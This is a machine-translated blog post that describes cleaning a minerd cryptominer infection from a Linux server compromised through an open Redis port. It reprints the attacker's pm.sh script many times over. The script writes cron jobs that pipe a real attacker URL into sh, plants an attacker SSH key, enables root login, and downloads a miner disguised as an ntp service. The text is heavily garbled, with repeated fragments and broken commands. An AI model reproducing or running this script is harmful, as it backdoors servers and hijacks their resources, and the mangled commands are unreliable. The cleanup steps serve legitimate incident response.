Accidentally installed a Redis service, opened a full network of the default port, the first thought that this server does not have public network IP, the results found regret Mo and AH
One day found that the CPU load is unusually high, found a minerd process accounted for a large number of cpu,google, found himself in the recruit
Here's the cleanup process.
First step
1. Stop Redis Service immediately, modify port permissions, add password measures
2. Delete the two contents of crontab according to the information on the Internet
sudo rm/var/spool/cron/root
sudo rm/var/spool/cron/crontabs/root
3. Enemy, win, study the virus of the initial speech file
Export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?070 6 | SH ">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM.S h?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/et C/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" >& Gt /etc/ssh/sshd_confIG echo "Authorizedkeysfile Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd restart "pm.sh" 28L, 1 470C 10,1-8 Top Export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl- Fssl http://r.chanstring.com/pm.sh?0706 | SH ">/var/spooll/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM . sh?0706 | SH ">/var/spooll/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 Zhxb3mtn++94rnitt Shrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wzz 7yEOWW/ QPJEOXLKN40Y5HFLU/XRE4DYBHQV8Q/Z/SDCVHT5FIFN+TKEZ3TXL6NQHTZ405PD3GLWFSJ1A/KVV 9RojF6wL4l3WCRDXu+ Dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1yy 993qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk755 neoiq echo" perMitrootlogin Yes >>/etc/ssh/sshd_config echo "rsaauthentication yes" >>/etc/ssh/sshd_config echo "P Ubkeyauthentication yes ">>/etc/ssh/sshd_config echo" authorizedkeysfile. Ssh/khk75neoiq >>/etc/ssh/ssh D_config/etc/init.d/sshd Restart 10,1-8 top export path= $PATH:/bin:/usr/bin:/usr/l Ocal/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/rr oot mkdir-p/var/spool/cron/crontabs echo" */10 * * * * CURL-FSSL HTTP://R.CHANSTRING.COM/PM . sh?0706 | SH ">/VAR/SPOOL/CRON/CC rontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 ZHXB3MTN++94RNITSHREWOCC 9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ QPJEOXLL Kn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm88 GSPJTuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbrr O4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/etc/ssh/sshd_conf IG echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "pubkeyauthentication yes" >>/etc/ssh/ss Hd_config echo "Authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd restart fi if [!-F "/ETC/INIT.D/NTP"]; Then 10,1-8 top export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM.S h?0706 | SH ">/var/spool/cron/crontabs/roo ot if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 Zhxb3mtN++94RNITSHREWOC9HZFS/F/YWW 8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ QPJEOXLKN40Y5HFLU/XRE4DYBHQQ v8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ Dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxx mvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "" > ~/.ssh/khk75neoiq echo "permitrootlogin yes" >>/ Etc/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" ;>/etc/ssh/sshd_config echo "Authorizedkeysfile Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/ssh D restart fi if [!-F "/ETC/INIT.D/NTP"]; Then if [!-F "/etc/systemd/system/ntp.service"]; Then mkdir-p/opt @ 10,1-8 Top export path= $PATH:/bin:/usr/bin:/usr/lo Cal/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/root mkdir-p/var/spooL/cron/crontabs echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 ZHXB3MTN++94RNITSHREWOC9HZFS/F/YW8KGHYTKVIAK/AA g1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ Qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txll 6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ Dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnyy tbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/et C/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" >& Gt /etc/ssh/sshd_config echo "Authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd rest Art fi if [!-F "/ETC/INIT.D/NTP"]; Then if [!-f]/etc/Systemd/system/ntp.service "]; Then mkdir-p/opt curl-fssl http://r.chanstring.com/v51/lady_ ' uname-m '-o/opt/khk75neoiq33 &&
chmod +x/opt/khk77 5neoiq33 &&/opt/khk75neoiq33-install fi fi 10,1-8 Top Export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * Curl-fssl Http://r.chanstri ng.com/pm.sh?0706 | SH ">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM.S h?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 Zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tt drzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/ QPJEOXLKN40Y5HFLU/XRE4DYBHQV8Q/Z/SDCVHT5FIFN+TKEZ3TXL6NQHTZ405PD3GLWFSJ1A/KV9ROJF6WW L4l3WCRDXu+ Dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpoM+ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xbladd y7vrnrvfav Root "> ~/.ssh/KHK75NEOiq echo" Permitrootlogin Yes >>/etc/ssh/sshd_config echo "rsaauthentication yes" >>/etc/ssh/sshd_config Echo "Pubkeyauthentication yes" >>/etc/ssh/sshd_config echo "authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/ Sshd_config/etc/init.d/sshd restart fi if [!-F "/ETC/INIT.D/NTP"]; Then if [!-F "/etc/systemd/system/ntp.service"]; Then mkdir-p/opt curl-fssl http://r.chanstring.com/v51/lady_ ' uname-m '-o/opt/khk75neoiq33 && chmod +x/opt/khk75neoiq33 &&/opp t/khk75neoiq33-install fi fi/etc/init.d/ntp start PS auxf|grep-v grep| grep "/usr/bin/cron" |awk ' {print $} ' |xargs kill-9 10,1-8 top ex Port path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/sPool/cron/root mkdir-p/var/spool/cron/crontabs echo "*/10 * * * Curl-fssl http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 Zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyy pLJ53mzb1JpQVj+wZ7yEOWW/ qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ DM8GSPJTUUXXU74ISEYJC4B0H1BWDQBB bxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y993qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/et C/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" >& Gt /etc/ssh/sshd_config echo "Authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd rest Art fi if [!-f]/etc/init.d/ntP "]; Then if [!-F "/etc/systemd/system/ntp.service"]; Then mkdir-p/opt curl-fssl http://r.chanstring.com/v51/lady_ ' uname-m '-o/opt/khk75neoiq33 && chmod +x/opt/khk75neoiq33 &&/opt/khk75neoiq33-instaa ll fi fi/etc/init.d/ntp start PS auxf|grep-v grep|
grep "/usr/bin/cron" |awk ' {print $} ' |xargs kill-9 ps auxf|grep-v grep|grep '/opt/cron ' |awk ' {print $} ' |xargs kill-9 ~ ~ ~ ~ ~ 10,1-8 All export path= $PATH:/bin:/usr/bin:/u Sr/local/bin:/usr/sbin echo "*/10 * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo" */10 * * * Curl-fssl HTTP://R.CHANSTRING.COM/PM.S h?0706 | SH ">/var/spool/cron/crontabs/root if [!-F"/root/.ssh/khk75neoiq "]; Then mkdir-p ~/.ssh rm-f ~/.ssh/authorized_keys* echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1 zhxb3mtn++94rnitshrewoc9hzfs/F/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz77 yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z /sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y999 3qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq echo" permitrootlogin yes ">>/et C/ssh/sshd_config echo "Rsaauthentication yes" >>/etc/ssh/sshd_config echo "Pubkeyauthentication yes" >& Gt /etc/ssh/sshd_config echo "Authorizedkeysfile. Ssh/khk75neoiq" >>/etc/ssh/sshd_config/etc/init.d/sshd rest Art fi if [!-F "/ETC/INIT.D/NTP"]; Then if [!-F "/etc/systemd/system/ntp.service"]; Then mkdir-p/opt curl-fssl http://r.chanstring.com/v51/lady_ ' uname-m '-o/opt/khk75neoiq33 && chmod +x/opt/khk75neoiq33 &&/opt/khk75neoiq33-install fi fi/etc/init.d/ntp start PS auxf|grep-v grep|gr EP "/usr/bin/cron" |awk ' {print $} ' |xaRGS kill-9 PS auxf|grep-v grep|grep "/opt/cron" |awk ' {print $} ' |xargs kill-9
Get the results
1. Delete crontab configuration file, as above we have deleted, the code involved
echo "*/10 * * * * * CURL-FSSL http://r.chanstring.com/pm.sh?0706 | SH ">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo" */10 * * * Curl-fssl http://r.chanstring. com/pm.sh?0706 | SH ">/var/spool/cron/crontabs/root
2. Delete This is used for password-free landing
Rm-f ~/.ssh/authorized_keys*
Rm-f ~/.ssh/khk75neoiq
You can even remove the. SSH directory directly.
The code involved
if [!-F "/root/.ssh/khk75neoiq"]; Then
mkdir-p ~/.ssh
rm-f ~/.ssh/authorized_keys*
echo "Ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/ 9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+ wZ77
yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+ dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ulhzdzqra3sx1y999
3qhnytbegn+ 9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root "> ~/.ssh/khk75neoiq
echo" Permitrootlogin yes "> >/etc/ssh/sshd_config
echo "rsaauthentication yes" >>/etc/ssh/sshd_config
echo " Pubkeyauthentication yes ">>/etc/ssh/sshd_config
echo" authorizedkeysfile. Ssh/khk75neoiq >>/etc/ Ssh/sshd_config
/etc/init.d/sshd Restart
fi
3. Delete/opt/This directory This thing is the fourth step of the service generated
4. Delete Service
Service NTP stop
Rm/etc/init.d/ntp
Rm/usr/sbin/ntp
The code involved
if [!-F "/ETC/INIT.D/NTP"]; Then
if [!-F "/etc/systemd/system/ntp.service"]; then
mkdir-p/opt Curl-fssl
V51/lady_ ' uname-m '-o/opt/khk75neoiq33 && chmod +x/opt/khk75neoiq33 &&/opt/khk75neoiq33-install
fi
fi
As on the code, downloaded a 8M program, is installed what things, the landlord did not know, but the next code exposed whereabouts
/ETC/INIT.D/NTP start
This line of code started NTP this service, Baidu search under said is a time service, in fact, this thing is a virus service, open this file, find the executable file/usr/sbin/ntp found file and that 8m file a byte is not bad
So delete this file
At last
PS Aux|grep Minerd
Kill all the processes, OK fix end
Half an hour later.
PS Aux|grep Minerd
Minerd process no longer appears
The above is a small series for everyone to bring the Linux minerd after the complete cleaning process (detailed) All content, I hope that we support cloud-Habitat Community ~